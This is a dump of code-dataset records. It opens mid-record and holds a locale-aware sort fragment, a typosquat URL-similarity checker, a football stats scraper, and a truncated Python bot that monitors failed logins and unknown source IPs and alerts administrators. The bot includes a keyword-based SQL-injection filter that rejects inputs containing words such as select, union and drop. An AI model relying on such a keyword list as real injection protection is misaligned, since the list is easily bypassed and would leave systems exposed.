feature['properties'].get(p)\n if v and isinstance(v, basestring):\n # get localized sort order by calling strxfrm\n # strxfrm expects encoded strings\n # split at whitespace as strxfrm can ignore it (depending on the collate)\n v = v.lower()\n v = v.replace(u'ä', 'ae')\n v = v.replace(u'ö', 'oe')\n v = v.replace(u'ü', 'ue')\n v = v.replace(u'ß', 'ss')\n v = tuple(locale.strxfrm(p) for p in\n v.encode(locale_encoding, errors='replace').split(' '))\n k.append(v)\n\n return tuple(k)\n\n features.sort(key=key)\n","sub_path":"munimap/query/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"115910190","text":"__version__G__ = \"(G)bd249ce4\"\n\nfrom ..logger.logger import logstring,verbose,verbose_flag\nfrom re import compile, findall,I\nfrom tld import get_fld,get_tld\nfrom tld.utils import update_tld_names\nfrom nltk import edit_distance\nfrom requests import get\nfrom io import BytesIO\nfrom zipfile import ZipFile\nfrom shutil import copyfileobj\nfrom os import path\nfrom itertools import islice\nfrom csv import reader\n\n#need refactoring\n\nclass URLSimilarity:\n @verbose(True,verbose_flag,\"Starting URLSimilarity\")\n def __init__(self):\n '''\n initialize class and get top 1m.csv from umbrella\n '''\n self.refs = path.abspath(path.join(path.dirname( __file__ ),\"..\", 'refs'))\n if not self.refs.endswith(path.sep): self.refs = self.refs+path.sep\n #if not path.isdir(self.refs): mkdir(self.refs)\n self.top = \"http://s3-us-west-1.amazonaws.com/umbrella-static/top-1m.csv.zip\"\n self.topsliced = None\n self.topdomains = None\n self.setup(self.refs)\n #update_tld_names()\n\n @verbose(True,verbose_flag,None)\n def setup(self,_path):\n '''\n check if top-1m.csv exists or not, if not then download load\n it and unzip it and take the top 10000 only\n '''\n if not path.exists(_path+'top-1m.csv'):\n zip_file = ZipFile(BytesIO(get(self.top).content))\n with zip_file.open('top-1m.csv') as zf, open(_path+'top-1m.csv', 'wb') as f:\n copyfileobj(zf, f)\n with open(_path+'top-1m.csv', 'r') as f:\n self.topsliced = islice(reader(f), 10000)\n self.topdomains = [x[1] for x in self.topsliced]\n\n @verbose(True,verbose_flag,None)\n def geturls(self,data):\n '''\n check if root domain exists in the top 10000 or not\n if yes appened it to list \n '''\n roots = []\n _x = list(set(findall(compile(r\"((http:\\/\\/www\\.|https:\\/\\/www\\.|http:\\/\\/|https:\\/\\/)[a-zA-Z0-9\\-\\.]+\\.[a-zA-Z]{2,3}(:[a-zA-Z0-9]*)?\\/?([a-zA-Z0-9_\\,\\'/\\+&%#\\$\\?\\=~\\.\\-])*)\",I),self.wordsstripped)))\n for _ in _x:\n if get_tld(_[0], fail_silently=True):\n root = None\n try:\n root = get_fld(_[0],fix_protocol=True)\n except:\n pass\n if root:\n roots.append(root)\n if roots:\n for domain in self.topdomains:\n dist = edit_distance(domain,root)\n if dist <= 2:\n data.append({\"Distance\":dist,\"URL\":root,\"Similar\":domain})\n\n\n @verbose(True,verbose_flag,\"Analyzing URLs\")\n def checkwithurls(self,data):\n '''\n start finding urls in top 10000 list \n '''\n self.words = data[\"StringsRAW\"][\"wordsinsensitive\"]\n self.wordsstripped = data[\"StringsRAW\"][\"wordsstripped\"]\n data[\"URLs\"] = {\"URLs\":[],\n \"_URLs\":[\"Distance\",\"URL\",\"Similar\"]}\n self.geturls(data[\"URLs\"][\"URLs\"])","sub_path":"qbanalyzer/modules/urlsimilarity.py","file_name":"urlsimilarity.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"24171383","text":"from bs4 import BeautifulSoup\n\nfrom scraping.getDataStatTable import getDataStatTable\nfrom scraping.URLCache import URLCache\nfrom scraping.kdbWriter import qConnection\n\n\ndef getSeason(url, odds_url, current_TF=False, useCache=True):\n # tested on\n # url = 'https://fbref.com/en/comps/9/1526/2016-2017-Premier-League-Stats'\n\n season_code = url.split('/')[6]\n\n html_files = URLCache()\n\n league_id, season_id, league_name = url.split('/')[5:]\n season_year = league_name.split('-')[0]\n league_name = '_'.join(league_name.split('-')[2:][:-1])\n\n response = html_files.getURL(url, useCache)\n soup = BeautifulSoup(response, 'html.parser')\n\n main_table = soup.find(\"table\", id='results' + season_code + '1_overall')\n\n res_table = getDataStatTable(main_table)\n\n res_table = res_table.assign(league_name=league_name) \\\n .assign(league_id=league_id) \\\n .assign(season_year=season_year) \\\n .assign(season_id=season_id) \\\n .assign(current_TF=current_TF) \\\n .assign(source=url) \\\n .assign(odds_source=odds_url)\n\n res_table['team_code'] = res_table['squad_link'].str.split('/').str[3]\n\n res_table.rename(columns={\"squad\": \"team\", \"squad_link\": \"team_link\"}, inplace=True)\n\n output = res_table[['source', 'odds_source', 'league_name', 'league_id',\n 'season_year', 'season_id', 'team',\n 'team_code', 'team_link', 'current_TF',\n 'games', 'wins', 'draws', 'losses']]\n\n convert_dict = {'source': str,\n 'odds_source': str,\n 'league_name': str,\n 'league_id': int,\n 'season_year': int,\n 'season_id': int,\n 'team': str,\n 'team_code': str,\n 'team_link': str,\n 'current_TF': bool,\n 'games': int,\n 'wins': int,\n 'draws': int,\n 'losses': int\n }\n\n kdb = qConnection()\n kdb.write(output.astype(convert_dict), 'Season')\n","sub_path":"96/scraping/getSeason.py","file_name":"getSeason.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"157840932","text":"#!/bin/env python3.6\n# -*- coding: utf-8 -*-\n\n__author__ = \"Oleg Evdokimov\"\n__disclaimer__ = \"\"\"\n\nЗависимости:\n clickhouse-driver==0.1.5\n jira==2.0.0\n loguru==0.5.3\n mailru-im-bot==0.0.14\n PyYAML==5.3.1\n schedule==0.6.0\n\nManuals: \n https://myteam.mail.ru/botapi/\n\"\"\"\n\nimport os\nimport sys\nfrom typing import Dict\nfrom functools import wraps\n\nimport schedule\nimport re\nimport yaml\nimport hashlib\nimport socket\nimport sqlite3\nimport requests\nimport json\n\nfrom loguru import logger\nfrom time import sleep\nfrom datetime import datetime, timedelta\nfrom bot.bot import Bot\nfrom bot.event import Event, EventType\nfrom bot.handler import MessageHandler, CommandHandler, BotButtonCommandHandler, UnknownCommandHandler\nfrom requests.exceptions import ReadTimeout, ConnectTimeout, ConnectionError\nfrom clickhouse_driver import Client\nfrom collections import deque\nfrom jira import JIRA\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom ipaddress import IPv4Address, IPv4Network, AddressValueError\n\nCONFIG_FILE = '/configs/secure_bot.yaml'\n\n\n# очередь для отпарсенных логов secure и tacacs (очередь событий)\nLogEventsQueue = deque()\n# очередь для аггрегированных логов tacacs (очередь событий)\nTacEventsQueue = deque()\n# очередь для аггрегированных логов secure (очередь событий)\nSecureEventsQueue = deque()\n# очередь для проверки source ip (очередь событий)\nSourceEventsQueue = deque()\n# очередь для событий, по которым юзеру отправлен запрос и ожидается ответ\nRequestEventsQueue = deque()\n# очередь для событий, по которым требуется создать jira-инц\nAlarmEventsQueue = deque()\n\n\n@dataclass\nclass DBQuery:\n table: str\n keys: list\n sql_query: str\n\n\nclass User:\n def __init__(self, usertype, login, chat_id):\n self._usertype = usertype\n self._login = login\n self._chat_id = chat_id\n\n @property\n def usertype(self):\n return self._usertype\n\n @property\n def login(self):\n return self._login\n\n @property\n def chat_id(self):\n return self._chat_id\n\n def __repr__(self):\n return f'{self._usertype} : {self._login} : {self._chat_id}'\n\n\nclass UserList:\n def __init__(self, usertype=None, user_dict=None):\n self.usertype_flag = None\n self.users = []\n if isinstance(user_dict, dict) and usertype:\n for uname, chat_id in user_dict.items():\n user = User(usertype, uname, chat_id)\n self.users.append(user)\n\n def __add__(self, new_user):\n if isinstance(new_user, User):\n self.users.append(new_user)\n return self\n\n def __setitem__(self, old_user: User, new_login: str):\n self.users.remove(old_user)\n old_user._login = new_login\n self.users.append(old_user)\n\n def __iter__(self):\n for u in self.users:\n yield u\n\n def __len__(self):\n return len(self.users)\n\n def __repr__(self):\n res = ''\n for u in self.users:\n res += '{}\\n'.format(''.join(u.__repr__()))\n return res\n\n def __format__(self, usertype):\n res = ''\n for u in self.users:\n if u.usertype == usertype:\n res += '{}\\n'.format(''.join(u.__repr__()))\n return res\n\n def __getattribute__(self, item):\n if item in (NETWORK, SERVER):\n self.usertype_flag = item\n return self\n elif item in ('logins',):\n res = []\n for u in self.users:\n if u.usertype == self.usertype_flag:\n res.append(u.login)\n return res\n return super().__getattribute__(item)\n\n def get_users(self, usertype=None, login=None, chat_id=None):\n user_list = []\n for u in self.users:\n if u.usertype == usertype or u.login == login or u.chat_id == chat_id:\n user_list.append(u)\n return user_list\n\n def get_user(self, usertype, login=None, chat_id=None):\n for u in self.users:\n if u.usertype == usertype and (u.login == login or u.chat_id == chat_id):\n return u\n # if user not found\n return User(usertype, UNKNOWN_USER, USER_ADMIN_CHAT_ID)\n\n def update_db(self, usertype=None, user_dict=None):\n if isinstance(user_dict, dict) and usertype:\n for uname, chat_id in user_dict.items():\n user = User(usertype, uname, chat_id)\n self.users.append(user)\n\n\n# класс для описания События (событие - запись из лог файла подпадающая под условие)\nclass EventLogClass:\n def __init__(self, log_date, alarm_type, username, login, host, src_ip, text, descr=''):\n self.date = log_date\n self.alarm_type = alarm_type\n self.username = username\n self.login = login\n self.host = host\n self.src_ip = src_ip\n self.text = text\n self.descr = descr\n self.request = False\n self.request_time = None\n self.second_request = False\n self.reply = False\n self.alarm = False\n self.hash = None\n\n def set_request(self, request_time):\n self.request = True\n self.request_time = request_time\n\n def set_reply(self):\n self.reply = True\n\n def set_alarm(self, flag):\n self.alarm = flag\n\n def set_hash(self, msg_text):\n self.hash = self.get_hash(msg_text)\n\n\n @staticmethod\n def get_hash(text):\n digest = hashlib.new('md5')\n digest.update(text.encode())\n return digest.hexdigest()\n\n def show(self):\n return ('hash_id: {} \\n date: {} - type: {} - user: {} - login: {} - host: {} - src: {} - text: {}'.\n format(self.hash,\n self.date,\n self.alarm_type,\n self.username,\n self.login,\n self.host,\n self.src_ip,\n self.text))\n\n\n\ntry:\n secure_bot = Bot(token=TOKEN, api_url_base=MYTEAM_URL)\nexcept Exception as error:\n logger.error(f'\\nCannot connect to the Bot API: {error.with_traceback(sys.exc_info()[2])}')\n os._exit(-1)\n\n\n\ndef buttons_answer_cb(bot, event):\n if event.data['callbackData'] == \"call_back_yes\":\n data = {\n 'from': {'firstName': event.data['from']['firstName'],\n 'lastName': event.data['from']['lastName'],\n 'userId': event.data['from']['userId']},\n 'chat': {'chatId': event.data['message']['chat']['chatId'],\n 'type': event.data['message']['chat']['type']},\n 'msgId': event.data['message']['msgId'],\n 'text': 'Yes',\n 'timestamp': event.data['message']['timestamp']\n }\n yes_msg = Event(EventType.NEW_MESSAGE, data)\n msg_text = event.data['message']['text']\n hash_log = EventLogClass.get_hash(msg_text)\n reply_bot(bot, yes_msg, hash_log)\n\n elif event.data['callbackData'] == \"call_back_no\":\n data = {\n 'from': {'firstName': event.data['from']['firstName'],\n 'lastName': event.data['from']['lastName'],\n 'userId': event.data['from']['userId']},\n 'chat': {'chatId': event.data['message']['chat']['chatId'],\n 'type': event.data['message']['chat']['type']},\n 'msgId': event.data['message']['msgId'],\n 'text': 'No',\n 'timestamp': event.data['message']['timestamp']\n }\n no_msg = Event(EventType.NEW_MESSAGE, data)\n msg_text = event.data['message']['text']\n hash_log = EventLogClass.get_hash(msg_text)\n reply_bot(bot, no_msg, hash_log)\n\n\ndef send_msg(chat_id, message, with_buttons=False):\n try:\n if not with_buttons:\n mt_response = secure_bot.send_text(chat_id=chat_id, text=message)\n logger.info(f'Myteam answer: {mt_response}')\n else:\n mt_response = secure_bot.send_text(\n chat_id=chat_id,\n text=message,\n inline_keyboard_markup=\"{}\".format(json.dumps([[\n {\"text\": \"ДА\", \"callbackData\": \"call_back_yes\", \"style\": \"primary\"},\n {\"text\": \"НЕТ\", \"callbackData\": \"call_back_no\", \"style\": \"attention\"}]])))\n if not mt_response.json()['ok']:\n text_to_chat = 'ERROR: check_alarm_queue(). Myteam message delivery error \\n ' \\\n 'response: {} \\n ' \\\n 'message: {} \\n ' \\\n 'user: {}'.format(mt_response.json(), message, chat_id)\n # myteam delivery\n secure_bot.send_text(chat_id=USER_ADMIN_CHAT_ID, text=text_to_chat)\n # telegram delivery\n data = {'chat_id': TG_MAJOR, 'text': text_to_chat}\n tg_response = requests.post(TG_URL + TG_TOKEN + '/sendMessage', data=data, proxies=TG_PROXIES)\n logger.info(f'Send_alarm_message: {tg_response.json()}, chat_id: {chat_id}')\n logger.info(f'Send_message: {message}, user: {chat_id}')\n except Exception as e:\n text_debug = f'{send_msg.__name__}\\nMessage: {message}\\nError: {e}'\n logger.error(text_debug)\n\n\n# get DATA from DB\ndef get_cmdb():\n request = CMDB_API_URL + 'NetworkHostListWithIP'\n try:\n json_response = requests.get(request, auth=(CMDB_API_USER, CMDB_API_PASS), timeout=(3, 5)).text\n cmdb_dict = json.loads(json_response)\n except (ReadTimeout, ConnectTimeout, ConnectionError, json.decoder.JSONDecodeError) as e:\n text = f'{get_cmdb.__name__}. CMDB connection error. {e}'\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n if cmdb_dict:\n return cmdb_dict\n else:\n text = f'{get_cmdb.__name__}. Cannot fetch data from CMDB.'\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n\n\ndef clear_cmdb_table():\n db_table = 'NetworkHostListWithIP'\n query_drop = 'DROP TABLE IF EXISTS {}'.format(db_table)\n query_vacuum = 'VACUUM'\n query_create = \"\"\"\n CREATE TABLE IF NOT EXISTS {} (\n HostName text NOT NULL,\n HostState text NOT NULL,\n IP text,\n HardwareModel_Name text,\n NetworkRoles text,\n OrgUnitName text);\n \"\"\".format(db_table)\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n cursor.execute(query_drop)\n cursor.execute(query_create)\n cursor.execute(query_vacuum)\n conn.commit()\n cursor.close()\n conn.close()\n return True\n except sqlite3.Error as e:\n text = f'ERROR: {clear_cmdb_table.__name__}. {e}'\n send_msg(USER_ADMIN_CHAT_ID, text)\n logger.error(e)\n return False\n\n\ndef clone_cmdb_to_local():\n logger.info(f'{clone_cmdb_to_local.__name__}')\n db_table = 'NetworkHostListWithIP'\n cmdb_dict = get_cmdb()\n if cmdb_dict is False:\n return False\n cmdb_list = list()\n for cd in cmdb_dict:\n cmdb_tuple = (\n cd['HostName'], cd['HostState'], cd['IP'], cd['HardwareModel_Name'], cd['NetworkRoles'], cd['OrgUnitName'])\n cmdb_list.append(cmdb_tuple)\n clear_cmdb_table()\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n query = 'INSERT INTO {} ({}, {}, {}, {}, {}, {}) VALUES (?, ?, ?, ?, ?, ?)' \\\n .format(db_table, 'HostName', 'HostState', 'IP', 'HardwareModel_Name', 'NetworkRoles', 'OrgUnitName')\n cursor.executemany(query, cmdb_list)\n conn.commit()\n cursor.close()\n conn.close()\n return True\n except sqlite3.Error as e:\n text = f'SQLite error in clone_cmdb_to_local(): {e}'\n send_msg(USER_ADMIN_CHAT_ID, text)\n logger.error(text)\n return False\n\n\ndef read_db(query):\n global NetworkHostListDB\n query_request = f'{query.sql_query} {query.table}'\n keys = query.keys\n fetch_db_list = []\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n cursor.execute(query_request)\n for row in cursor:\n i = 0\n item_db_dict = {}\n for key in keys:\n item_db_dict[key] = row[i]\n i += 1\n fetch_db_list.append(item_db_dict)\n conn.commit()\n cursor.close()\n conn.close()\n except Exception as e:\n logger.error(f'{e.with_traceback(sys.exc_info()[2])}')\n return False\n NetworkHostListDB = fetch_db_list\n return True\n\n\ndef get_host_db(key, value, outbound_key):\n for item in NetworkHostListDB:\n if item.get(key) == value:\n return item[outbound_key]\n return value\n\n\ndef is_valid_src_ip(src, valid_sources):\n for valid_src in valid_sources:\n try:\n if src == valid_src or IPv4Address(src) in IPv4Network(valid_src):\n return True\n except AddressValueError:\n logger.error(f'AddressValueError in {is_valid_src_ip.__name__}')\n return False\n\n\ndef parse_username(usertype, user_login):\n logins: list = []\n if usertype == SERVER:\n logins = USERS.server.logins\n elif usertype == NETWORK:\n logins = USERS.network.logins\n pattern = re.compile('|'.join(logins))\n suspicious_user = pattern.search(user_login)\n if not suspicious_user:\n return str('')\n return suspicious_user.group()\n\n\n# парсим логи из базы за время PARSE_TIME с задержкой DELAY_TIME от текущего времени\ndef parse_log(db_client, log_template_alarm_list, log_template_info_list, alarm_types):\n global DATE_PARSE_BEGIN, BOT_ALIVE\n current_date = datetime.now()\n date2 = current_date - timedelta(seconds=DELAY_TIME)\n date1 = DATE_PARSE_BEGIN + timedelta(seconds=1)\n DATE_PARSE_BEGIN = date2\n date1_sql = date1.strftime(\"%Y-%m-%d %H:%M:%S\")\n date2_sql = date2.strftime(\"%Y-%m-%d %H:%M:%S\")\n query = \"\"\"\n WITH\n toDateTime('{}') as date_1,\n toDateTime('{}') as date_2 \n SELECT * from distributed_logs PREWHERE Alarm_type IN ('{}','{}') AND Timestamp >= date_1 AND Timestamp <= date_2 ORDER BY Timestamp\n \"\"\".format(date1_sql, date2_sql, *alarm_types)\n\n log_data = []\n logger.debug(f'QUERY: {query}')\n t1 = datetime.now()\n try:\n log_data = db_client.execute(query)\n except Exception as e:\n text = f'ERROR: clickhouse connection failed: {e}'\n logger.error(e)\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n except KeyboardInterrupt:\n logger.info('\\nterminate script process by Ctrl-C\\n')\n os._exit(1)\n\n template_alarm = re.compile(('|'.join(log_template_alarm_list)))\n template_info = re.compile(('|'.join(log_template_info_list)))\n logger.debug(f'Logs Count: {len(log_data)}')\n for item in log_data:\n event_text = item[5]\n if template_alarm.search(event_text):\n parse_event(item)\n if template_info.search(event_text):\n parse_event(item, success_login=True)\n\n t2 = datetime.now()\n logger.debug(f'SQL Query Time: {str((t2 - t1).total_seconds())}')\n logger.debug(f'{parse_log.__name__}')\n BOT_ALIVE = True\n return True\n\n\ndef parse_event(item, success_login=False):\n logger.debug(f'LOG EVENT: {str(item)}')\n\n event_login = UNKNOWN_USER\n event_src_ip = '0.0.0.0'\n log_template = str()\n event_create_time = item[1]\n event_host = item[2]\n alarm_type = item[4]\n event_text = item[5]\n\n for item in LOG_SERVER_TEMPLATES:\n if item in event_text:\n event_text = event_text[event_text.find(item):]\n\n if alarm_type == ALARM_TYPES[SERVER]:\n secure_log_entry_re = re.compile(r\"(?P(?:(\\D+)|\\D+\\S+))\\s+\"\n r\"for\\s+\"\n r\"(?P(?:((?:illegal|invalid)\\ user\\s+)|))\"\n r\"(?P(?:(\\S+)|))(?:(\\s+)|)\"\n r\"from\\s+\"\n r\"(?P(?:(\\S+)))\\s*\", re.VERBOSE)\n\n log_match = secure_log_entry_re.match(event_text)\n\n if log_match:\n event_login = log_match.groupdict()['user']\n event_src_ip = log_match.groupdict()['src_ip']\n log_template = log_match.groupdict()['log_template']\n else:\n text = f'ERROR: Cannot parse log message: {event_text}'\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n\n user: User = USERS.get_user(usertype=SERVER, login=event_login)\n\n # don't send msg, don't create inc\n if user.chat_id == NOT_SEND:\n return True\n\n # send msg to chat only, don't create inc (if LOGIN_SUCCESS)\n if success_login:\n # success login to server for unknown user\n if user.login == UNKNOWN_USER:\n msg = MSG_ADMIN_UNKNOWN_LOGIN_SUCCESS\n # success login to server for valid user\n else:\n msg = MSG_USER_LOGIN_SUCCESS\n\n text = f\"{event_host} - {msg}\\n\\n\" \\\n f\"Date/Time: {event_create_time.strftime('%d %B - %H:%M:%S')}\\n\" \\\n f\"Source IP: {event_src_ip}\\n\\n\" \\\n f\"Log: {event_text}\"\n send_msg(USER_ADMIN_CHAT_ID, text)\n return True\n\n # find similar username\n event_user = parse_username(usertype=SERVER, user_login=event_login)\n # user is unknown ?\n if len(event_user) == 0:\n event_user = UNKNOWN_USER\n\n log_event = EventLogClass(event_create_time, alarm_type, event_user, event_login, event_host, event_src_ip, event_text)\n logger.debug(f'{parse_event.__name__} {log_event.show()}')\n\n if CHECK_SERVER_SOURCE_IP_TEMPLATE.lower() in log_template.lower():\n SourceEventsQueue.append(log_event)\n elif CHECK_SERVER_FAILED_LOGIN.lower() in log_template.lower():\n SecureEventsQueue.append(log_event)\n\n ######\n elif alarm_type == ALARM_TYPES[NETWORK]:\n device_ip = event_text.split(' ')[1]\n try:\n event_hostname = socket.gethostbyaddr(device_ip)[0]\n if event_hostname == device_ip:\n event_hostname = get_host_db('IP', device_ip, 'HostName')\n except socket.herror:\n event_hostname = get_host_db('IP', device_ip, 'HostName')\n\n tac_log_entry_re = re.compile(r\"tac_plus\\[\\d+]:\\s+(?P\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\\s*\"\n r\"(?P(?:(\\S+)|))(?:(\\s+)|)\"\n r\"(?P(?:(\\S+)|))(?:(\\s+)|)\"\n r\"(?P(?:(\\s+\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}))|(\\s+\\S+))\\s+\"\n r\"(?:shell|pap)\\s+login\\s+failed\", re.VERBOSE)\n\n log_match = tac_log_entry_re.match(event_text)\n\n if log_match:\n event_login = log_match.groupdict()['user'].strip(' ')\n event_src_ip = log_match.groupdict()['src_ip'].strip(' ')\n else:\n text = 'ERROR: Cannot parse log message: ' + event_text\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n user: User = USERS.get_user(usertype=NETWORK, login=event_login)\n\n # don't send msg, don't create inc\n if user.chat_id == NOT_SEND:\n return True\n\n # find similar username\n event_user = parse_username(usertype=NETWORK, user_login=event_login)\n\n # user is unknown ?\n if len(event_user) == 0:\n event_user = UNKNOWN_USER\n\n log_event = EventLogClass(event_create_time, alarm_type, event_user, event_login, event_hostname, event_src_ip,\n event_text)\n\n # if well-known source - don't create Event\n if not is_valid_src_ip(event_src_ip, LIGITIMATE_EXCEPT_SRC):\n SourceEventsQueue.append(log_event)\n\n logger.debug(f'{parse_event.__name__}. LEN Source Events: {len(SourceEventsQueue)}')\n logger.debug(f'{parse_event.__name__}. TAC Event: {log_event.show()}')\n else:\n return False\n logger.debug('', parse_event.__name__)\n return True\n\n\n# проверяем ивенты в SOURCE очереди и генерим алармы при не валидном src_ip\ndef source_queue_checker():\n logger.debug(f'{source_queue_checker.__name__}')\n logger.debug(f'LEN SourceEventsQueue: {len(SourceEventsQueue)}')\n\n while SourceEventsQueue:\n log_event = SourceEventsQueue.popleft()\n logger.debug(f'{source_queue_checker.__name__}. Username: {log_event.username}')\n\n if not is_valid_src_ip(log_event.src_ip, SRC_VALID_NETS):\n log_event.descr = MSG_ADMIN_UNKNOWN_SOURCE\n AlarmEventsQueue.append(log_event)\n logger.debug(f'{source_queue_checker.__name__}. LEN ALARM Events: {len(AlarmEventsQueue)}')\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nLogin: {}\\n{}'.format(MSG_ADMIN_UNKNOWN_SOURCE, log_event.src_ip,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.login, log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n\n logger.debug(f'{source_queue_checker.__name__}. Log Event: {log_event.show()}')\n elif log_event.alarm_type == ALARM_TYPES[NETWORK]:\n TacEventsQueue.append(log_event)\n logger.debug(f'{source_queue_checker.__name__}. LEN TAC Events: {len(TacEventsQueue)}')\n\n\n# проверяем ивенты в SECURE очереди и генерим алармы при превышении пороговых условий\ndef secure_queue_checker():\n logger.debug(f'{secure_queue_checker.__name__}. LEN SecureEventsQueue: {len(SecureEventsQueue)}')\n login_failed_user_count = {}\n is_user_alarm = dict()\n\n while SecureEventsQueue:\n log_event = SecureEventsQueue.popleft()\n user_device = (log_event.username, log_event.host)\n logger.debug(f'{secure_queue_checker.__name__}. Username_Device: {user_device}')\n\n if not is_user_alarm.get(user_device, False):\n if log_event.username not in login_failed_user_count.keys():\n logger.debug(f'{secure_queue_checker.__name__}. Server Failed Users = 1')\n login_failed_user_count[user_device] = 1\n else:\n u = login_failed_user_count[user_device] + 1\n login_failed_user_count[user_device] = u\n logger.debug(f'{secure_queue_checker.__name__}. Server Failed Users = {u}')\n\n count_user = login_failed_user_count[user_device]\n\n if log_event.username == UNKNOWN_USER:\n max_attempts = MAX_UNKNOWN_USER_ATTEMPTS_SRV\n else:\n max_attempts = MAX_USER_ATTEMPTS_SRV\n\n if count_user >= max_attempts:\n alarm_text = '{}: \"{}\"'.format(MSG_ADMIN_LOGIN_FAILED, log_event.login)\n log_event.descr = alarm_text\n suspicious_user: User = USERS.get_user(usertype=ALARM_TYPES[log_event.alarm_type], login=log_event.login)\n\n if suspicious_user.login == UNKNOWN_USER:\n log_event.descr = MSG_ADMIN_UNKNOWN_USER\n AlarmEventsQueue.append(log_event)\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_ADMIN_UNKNOWN_USER,\n log_event.login,\n log_event.date.strftime(\n '%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n else:\n LogEventsQueue.append(log_event)\n is_user_alarm[user_device] = True\n logger.debug(f'{secure_queue_checker.__name__} Log Event: {log_event.show()}')\n\n\n# проверяем ивенты в TAC очереди и генерим алармы при превышении пороговых условий\ndef tac_queue_checker():\n login_failed_user_count = {}\n is_user_alarm = dict()\n logger.debug(f'{tac_queue_checker.__name__}. LEN TacEventsQueue: {len(TacEventsQueue)}')\n\n while TacEventsQueue:\n log_event = TacEventsQueue.popleft()\n user_device = (log_event.username, log_event.host)\n logger.debug(f'{tac_queue_checker.__name__}. Username: {log_event.username}')\n\n if not is_user_alarm.get(user_device, False):\n if log_event.username not in login_failed_user_count.keys():\n logger.debug(f'{tac_queue_checker.__name__}. Tacacs Failed Users = 1')\n login_failed_user_count[user_device] = 1\n else:\n u = login_failed_user_count[user_device] + 1\n login_failed_user_count[user_device] = u\n logger.debug(f'{tac_queue_checker.__name__}. Tacacs Failed Users = {u}')\n\n count_user = login_failed_user_count[user_device]\n\n if log_event.username == UNKNOWN_USER:\n max_attempts = MAX_UNKNOWN_USER_ATTEMPTS_NET\n else:\n max_attempts = MAX_USER_ATTEMPTS_NET\n\n if count_user >= max_attempts:\n log_event.descr = MSG_ADMIN_LOGIN_FAILED\n suspicious_user = parse_username(usertype=NETWORK, user_login=log_event.username)\n if suspicious_user in USERS.network.logins:\n LogEventsQueue.append(log_event)\n else:\n AlarmEventsQueue.append(log_event)\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_ADMIN_UNKNOWN_USER,\n log_event.login,\n log_event.date.strftime(\n '%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n is_user_alarm[user_device] = True\n logger.debug(f'{tac_queue_checker.__name__}. Log Event: {log_event.show()}')\n\n\n# проверяем на sql инъекции аргументы в команде /reg\ndef verify_sql_inj(str_from_chat):\n pattern_special_symbols = '[()\\[\\]\\'=,{};\"/]'\n if re.search(pattern_special_symbols, str_from_chat):\n return False\n pattern_sql_commands = re.compile(\n '(select|union|where|substr|when|from|limit|then|else|match|true|false|drop|create)')\n if pattern_sql_commands.search(str_from_chat.lower()):\n return False\n return True\n\n\ndef new_user_registration(event, usertype, userlogin):\n global USERS\n if userlogin:\n login_username = userlogin\n else:\n login_username = event.from_chat.split('@')[0].strip()\n logger.info(f'New registration: {login_username}, from: {event.from_chat}')\n new_user = User(usertype, login_username, event.from_chat)\n USERS += new_user\n text = '{}: {} в {} боте'.format(MSG_USER_REG, login_username, usertype)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n write_user_db(new_user)\n logger.info(f'Add new user: {login_username}')\n\n\ndef update_user_registration(event, usertype, userlogin):\n user: User = USERS.get_user(usertype=usertype, chat_id=event.from_chat)\n if userlogin != user:\n logger.info(f'Change registration: {user.login}')\n new_user = User(usertype, userlogin, event.from_chat)\n USERS[user] = userlogin\n write_user_db(new_user, 'update')\n text = '{}: {}'.format(MSG_USER_CHANGE_LOGIN, userlogin)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n\n\ndef bot_cmd_reg_handler(bot, event):\n (cmd, usertype, userlogin) = event.text.split(\" \")\n logger.info(f'New user registration: {usertype[1:]} : {userlogin} : {event.from_chat}')\n if not verify_sql_inj(userlogin):\n text = f'From: {event.from_chat}\\n Подозрительный запрос на регистрацию: {event.text}'\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n chat_username, user_domain = event.from_chat.split('@')\n if user_domain not in MAIL_DOMAIN:\n logger.warning(f'Невалидный домен в chat_id: {chat_username}@{user_domain}')\n return False\n\n logger.info(f'{usertype} <<>> {event.from_chat} <<>> {USERS.get_user(usertype=usertype, chat_id=event.from_chat)}')\n\n if USERS.get_user(usertype=usertype, chat_id=event.from_chat) and not userlogin:\n user: User = USERS.get_user(usertype=usertype, chat_id=event.from_chat)\n text = '{}: {}'.format(MSG_USER_EXIST, user.login)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n elif not USERS.get_user(usertype=usertype, chat_id=event.from_chat):\n new_user_registration(event, usertype, userlogin)\n elif userlogin:\n update_user_registration(event, 